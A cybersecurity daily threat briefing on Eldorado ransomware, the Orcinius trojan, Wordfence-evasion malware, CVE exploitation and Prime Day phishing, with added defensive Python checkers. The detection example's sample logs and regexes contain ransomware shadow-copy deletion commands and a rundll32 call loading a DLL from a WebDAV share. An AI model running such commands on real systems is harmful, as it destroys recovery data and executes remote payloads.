Cyware Daily Threat Intelligence

Daily Threat Briefing Jul 8, 2024

In the digital Wild West, a new ransomware outlaw named Eldorado has ridden into town. The emerging RaaS targets Windows hosts and VMware ESXi virtual machines and has already claimed 16 victims across several sectors, most of them in the U.S.

Meanwhile, cybercriminals are exploiting a Microsoft SmartScreen bypass (CVE-2024-21412) in a campaign spanning Spain, the U.S., and Australia. Using lures themed around healthcare insurance, transportation, and taxes, the attackers trick individuals and organizations into fetching malicious payloads.

As Amazon Prime Day approaches, researchers warn of increased cybercriminal activity targeting online shoppers. A surge in suspicious domains impersonating Amazon has been observed, with criminals employing phishing emails, fake domains, and deceptive files to steal sensitive information.

Top Malware Reported in the Last 24 Hours

Dropbox drops Orcinius trojan

The newly identified multi-stage trojan Orcinius abuses popular cloud services such as Dropbox and Google Docs to host its later stages. The chain starts with an innocuous-looking Excel spreadsheet containing a modified VBA macro; once the macro runs, it captures keystrokes and the active window, then pulls secondary payloads from those cloud services, blending in with legitimate traffic to evade detection.
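The chain above begins with a spreadsheet whose macro is the only malicious part, so the first question for a triage analyst is simply whether a workbook carries VBA at all. The following check is an added example and not code from the report: OOXML workbooks are ZIP containers, and a macro-enabled one stores its code in the part xl/vbaProject.bin, so the container is inspected rather than the file extension, which an attacker controls. The fixture workbooks are constructed in memory and mimic only the container layout, not a real Orcinius sample.

```python
import io
import zipfile

VBA_PART = "xl/vbaProject.bin"  # where OOXML keeps a workbook's VBA project


def has_vba_project(workbook_bytes: bytes) -> bool:
    """Return True if the OOXML spreadsheet carries a VBA project.

    The extension (.xlsx vs .xlsm) is not consulted: a renamed file or a
    mislabeled download still contains the part if a macro is present.
    """
    try:
        with zipfile.ZipFile(io.BytesIO(workbook_bytes)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return False  # not an OOXML container (legacy .xls or junk)
    return any(name.lower() == VBA_PART.lower() for name in names)


def build_workbook(with_macro: bool) -> bytes:
    """Constructed test fixture: a minimal OOXML-shaped ZIP, not a real file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        if with_macro:
            # An OLE compound-file header is what a real vbaProject.bin starts with.
            zf.writestr(VBA_PART, b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16)
    return buf.getvalue()


def triage(samples: dict) -> dict:
    """Map sample name -> 'macro' / 'clean' / 'not-ooxml' for a batch of files."""
    verdicts = {}
    for name, data in samples.items():
        if has_vba_project(data):
            verdicts[name] = "macro"
        else:
            try:
                zipfile.ZipFile(io.BytesIO(data)).close()
                verdicts[name] = "clean"
            except zipfile.BadZipFile:
                verdicts[name] = "not-ooxml"
    return verdicts


if __name__ == "__main__":
    batch = {
        "invoice.xlsx": build_workbook(with_macro=True),   # macro hidden behind .xlsx
        "report.xlsx": build_workbook(with_macro=False),
        "legacy.xls": b"\xd0\xcf\x11\xe0 not a zip",
    }
    for name, verdict in triage(batch).items():
        print(f"{name}: {verdict}")
```

A hit only says the file contains a VBA project; the macro still has to be extracted and read (for instance with oletools' olevba) to see what it downloads and from where. Legacy binary .xls files are OLE documents rather than ZIPs and need that tooling directly.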

New variant of Wordfence evasion malware

A new variant of Wordfence evasion malware has been discovered that disables the popular WordPress security plugin, creates a malicious admin user, and uses obfuscation and a fake Wordfence overlay to conceal its presence and activity. The malicious plugin in this case was named "wp-engine-fast-action", even though the site was not hosted on WP Engine. The malware renames the Wordfence plugin directory to "wordfence1"; because WordPress deactivates any plugin whose main file is no longer at the recorded path, this alone disables the security plugin. The malicious plugin also ships JavaScript and CSS files that create the false impression that Wordfence scans are still enabled and running normally.
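The two file-system indicators in the report (a Wordfence directory under a different name, and the "wp-engine-fast-action" slug) are easy to check on a host without trusting the dashboard the malware has faked. The script below is an added example, not code from the report: it audits the wp-content/plugins tree of a WordPress install and runs against a constructed fixture directory rather than a live site. The indicator lists are an assumption seeded only from the slugs the report names.

```python
import tempfile
from pathlib import Path

# Seeded from the report; extend as further variants are documented.
SUSPICIOUS_PLUGIN_SLUGS = {"wp-engine-fast-action"}
WORDFENCE_MAIN_FILE = "wordfence.php"  # Wordfence's real main plugin file

FINDING_RENAMED = "wordfence directory renamed (plugin deactivated)"
FINDING_MALICIOUS = "known malicious plugin slug"


def audit_plugins(wp_root) -> list:
    """Return (finding, path) tuples for a WordPress installation root."""
    plugins = Path(wp_root) / "wp-content" / "plugins"
    if not plugins.is_dir():
        return [("plugins directory not found", str(plugins))]
    findings = []
    for path in sorted(p for p in plugins.iterdir() if p.is_dir()):
        # Wordfence only works when its main file lives at plugins/wordfence/;
        # the same file under any other directory name means it was moved.
        if path.name != "wordfence" and (path / WORDFENCE_MAIN_FILE).is_file():
            findings.append((FINDING_RENAMED, str(path)))
        if path.name in SUSPICIOUS_PLUGIN_SLUGS:
            findings.append((FINDING_MALICIOUS, str(path)))
    return findings


def make_fixture(compromised: bool = True) -> str:
    """Constructed fixture: a throwaway directory shaped like a WordPress tree."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    plugins = Path(root, "wp-content", "plugins")
    (plugins / "akismet").mkdir(parents=True)
    wf_dir = plugins / ("wordfence1" if compromised else "wordfence")
    wf_dir.mkdir()
    (wf_dir / WORDFENCE_MAIN_FILE).write_text("<?php /* Plugin Name: Wordfence */\n")
    if compromised:
        evil = plugins / "wp-engine-fast-action"
        evil.mkdir()
        (evil / "wp-engine-fast-action.php").write_text("<?php /* overlay + admin user */\n")
    return root


if __name__ == "__main__":
    for finding, path in audit_plugins(make_fixture(compromised=True)):
        print(f"[!] {finding}: {path}")
```

On a real host, pair the file-system view with WP-CLI so the fake overlay cannot hide state: `wp plugin list --status=active` should list wordfence, and `wp user list --role=administrator` should contain no account the site owner did not create.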

Threat landscape sees new RaaS

A new RaaS called Eldorado has emerged, targeting Windows hosts and VMware ESXi virtual machines. It encrypts files with the ChaCha20 algorithm, also reaches out to network shares, and deletes shadow volume copies so that victims cannot restore from local snapshots. The ransomware has already claimed 16 victims, primarily in the U.S., across various sectors, and affiliates can customize the payload for each attack.

Top Vulnerabilities Reported in the Last 24 Hours

CISA adds Cisco NX-OS bug to KEV Catalog

CISA added a Cisco NX-OS command injection vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog. The flaw, tracked as CVE-2024-20399, is under active exploitation by a China-linked group called Velvet Ant. It lets an attacker who already holds administrator credentials execute arbitrary commands as root on the underlying operating system of affected devices, which is why Cisco, alongside releasing patches, recommends monitoring and rotating administrative user credentials. Federal agencies have been ordered to fix the vulnerability by July 23, 2024, in line with Binding Operational Directive 22-01 on known exploited vulnerabilities.

Active campaign abuses Microsoft SmartScreen bug

Cyble spotted an active campaign exploiting the Microsoft SmartScreen vulnerability CVE-2024-21412, a security-feature bypass involving Internet Shortcut files that Microsoft patched in February 2024, against targets in Spain, the U.S., and Australia. The attackers use healthcare insurance, transportation, and tax-related lures to trick individuals and organizations into fetching malicious payloads. The infection starts with a spam email whose link leads to a WebDAV share, and the multi-stage chain uses DLL sideloading and IDATLoader to inject the final payload, Lumma or Meduza Stealer, into explorer.exe. Hosts that applied the February update are not vulnerable to the bypass itself, so the campaign depends on unpatched machines.
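Two behaviours in today's items leave traces in process-creation telemetry: the shadow copy deletion Eldorado performs before encrypting, and the SmartScreen campaign's habit of running content straight from a WebDAV share. The detection logic below is an added example, not code from either report. It assumes a simple pipe-delimited export of process-creation events (timestamp, parent image, image, command line) and a constructed sample; the exact shadow-deletion commands are an assumption based on the commonly used vssadmin, wmic and Win32_ShadowCopy variants, since the report only says that shadow copies are deleted, and the WebDAV indicator relies on the DavWWWRoot and @SSL markers Windows uses in UNC paths to WebDAV shares.

```python
import re
from dataclasses import dataclass

# Constructed sample events (ts|parent|image|command line); not real logs.
SAMPLE_EVENTS = r"""
2024-07-08T10:01:02|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe report.txt
2024-07-08T10:03:15|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c vssadmin.exe delete shadows /all /quiet
2024-07-08T10:03:16|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic shadowcopy delete
2024-07-08T10:05:40|C:\Windows\explorer.exe|C:\Windows\System32\rundll32.exe|rundll32.exe \\203.0.113.5@SSL\DavWWWRoot\tax\invoice.dll,Start
2024-07-08T10:06:01|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -c "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"
2024-07-08T10:07:30|C:\Windows\explorer.exe|\\203.0.113.5\DavWWWRoot\hr\policy.exe|policy.exe
"""

# Ransomware pre-encryption step: three common ways to remove VSS snapshots.
SHADOW_COPY_DELETION = [
    re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I),
    re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I),
    re.compile(r"win32_shadowcopy\b.*\b(delete|remove)", re.I),
]

# UNC path to a WebDAV share: \\host[@SSL|@port]\DavWWWRoot\...
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+(@ssl|@\d+)?\\davwwwroot\\", re.I)


@dataclass
class Event:
    ts: str
    parent: str
    image: str
    cmdline: str


def parse_events(text: str) -> list:
    events = []
    for line in text.strip().splitlines():
        ts, parent, image, cmdline = line.split("|", 3)
        events.append(Event(ts, parent, image, cmdline))
    return events


def detect(events: list) -> list:
    """Return (rule, timestamp, command line) for each event matching a rule."""
    alerts = []
    for ev in events:
        if any(rule.search(ev.cmdline) for rule in SHADOW_COPY_DELETION):
            alerts.append(("shadow_copy_deletion", ev.ts, ev.cmdline))
        # Either the executable itself lives on the share or the command line
        # names a payload there (the rundll32 and direct-execution cases).
        if WEBDAV_UNC.search(ev.image) or WEBDAV_UNC.search(ev.cmdline):
            alerts.append(("webdav_execution", ev.ts, ev.cmdline))
    return alerts


if __name__ == "__main__":
    for rule, ts, cmd in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{ts} {rule}: {cmd}")
```

Shadow copy deletion by backup software will also fire the first rule, so tune on the parent process and the account; WebDAV execution from an Internet address has far fewer legitimate explanations and is worth alerting on directly.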

Top Scams Reported in the Last 24 Hours

Fake domains ahead of Amazon Prime Day

Check Point noted an increase in cybercriminal activity targeting online shoppers ahead of Amazon Prime Day on July 16-17. Researchers have observed a surge in suspicious domains impersonating Amazon, aimed at stealing sensitive information such as login credentials and payment details. The tactics include phishing emails, fake domains, and deceptive files. Online shoppers should stay cautious around Prime Day: check that a link's domain is actually Amazon's before signing in, use strong, unique passwords, and be wary of unsolicited emails about orders or deals.
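"Checking URLs" is harder than it sounds, because the brand name appears in most lookalikes by design. The check below is an added example rather than anything from Check Point's research: it treats a link as legitimate only when its registrable domain is on an allow-list, and flags the brand appearing anywhere else in the host, including digit and Cyrillic homoglyph substitutions. The allow-list, the two-label suffix set and the sample URLs are constructed for the example; a production version would use the Public Suffix List and the full set of Amazon storefront domains.

```python
from urllib.parse import urlsplit

# Partial allow-list of Amazon storefront registrable domains (assumption).
AMAZON_REGISTRABLE = {"amazon.com", "amazon.co.uk", "amazon.de", "amazon.ca", "amazon.co.jp"}

# Two-label public suffixes that occur in the sample; derive from the PSL in practice.
TWO_LABEL_SUFFIXES = {"co.uk", "co.jp", "com.au", "com.br"}

# Substitutions attackers use for Latin letters: digits and Cyrillic homoglyphs.
CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "3": "e",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0441": "c", "\u0440": "p",
})


def registrable_domain(ascii_host: str) -> str:
    labels = ascii_host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def normalize(unicode_host: str) -> str:
    """Fold substitutions so 'amaz0n', 'arnazon' and Cyrillic variants read 'amazon'."""
    return unicode_host.lower().translate(CONFUSABLES).replace("rn", "m")


def classify(url: str) -> str:
    """'legitimate' only when the registrable domain is allow-listed;
    'lookalike' when the brand appears anywhere else in the host; else 'unrelated'."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").rstrip(".")
    try:
        if any(label.startswith("xn--") for label in host.split(".")):
            unicode_host = host.encode("ascii").decode("idna")  # punycode given
            ascii_host = host
        else:
            unicode_host = host
            ascii_host = host.encode("idna").decode("ascii")
    except UnicodeError:
        return "lookalike"  # a hostname that cannot be encoded is not trustworthy
    if registrable_domain(ascii_host) in AMAZON_REGISTRABLE:
        return "legitimate"
    if "amazon" in normalize(unicode_host):
        return "lookalike"
    return "unrelated"


# Constructed sample links, not domains from the report.
SAMPLE_URLS = [
    "https://www.amazon.com/ap/signin",
    "https://www.amazon.co.uk/",
    "https://www.amazon.com.prime-day-deals.xyz/login",
    "http://amazon-prime.deals/claim",
    "https://amaz0n.com/",
    "https://amaz\u043en.com/",          # Cyrillic 'о' in place of Latin 'o'
    "https://example.org/",
]


def check_urls(urls: list) -> dict:
    return {u: classify(u) for u in urls}


if __name__ == "__main__":
    for url, verdict in check_urls(SAMPLE_URLS).items():
        print(f"{verdict:<10} {url}")
```

The key design point is that only the allow-list grants "legitimate"; the subdomain trick (amazon.com.prime-day-deals.xyz) passes every check that merely looks for the brand string, which is exactly the instinct the phishing domains exploit.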